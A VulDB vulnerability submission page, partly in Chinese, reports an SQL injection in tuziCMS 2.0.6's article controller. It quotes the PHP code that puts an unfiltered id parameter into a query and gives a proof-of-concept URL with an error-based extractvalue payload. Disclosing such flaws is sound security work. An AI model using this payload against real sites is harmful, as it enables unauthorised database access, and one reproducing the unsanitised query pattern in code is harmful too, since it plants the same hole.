提交 #71150: tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject信息

标题tuziCMS 2.0.6 App\Manage\Controller\ArticleController.class.php has SQLinject
描述hello, i am a newcomer. First submission vulnerability. A vulnerability classified as serious was found. The article module does not filter the id parameter. Causes a SQL injection vulnerability.It can query sensitive data, operate database and other hazards. code: \App\Manage\Controller\ArticleController.class.php line: 18 - 22 public function index(){ C('TOKEN_ON',false);//关闭表单令牌 //查询指定id的栏目信息 $id=I('get.id');//类别ID $topcate=M('Column')->where("id=$id")->order('column_sort')->select(); // dump($topcate); // exit; POC: http: //127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))
来源⚠️ https://github.com/yeyinshi/tuzicms/issues/12
用户
 Evilmu1 (UID 38763)
提交2023-01-12 04時47分 (3 年前)
管理2023-01-12 15時46分 (11 hours later)
状态已接受
VulDB条目218151 [TuziCMS 2.0.6 Article ArticleController.class.php index 标识符 SQL注入]
积分20

上一步一览下一步

Do you need the next level of professionalism?

Upgrade your account now!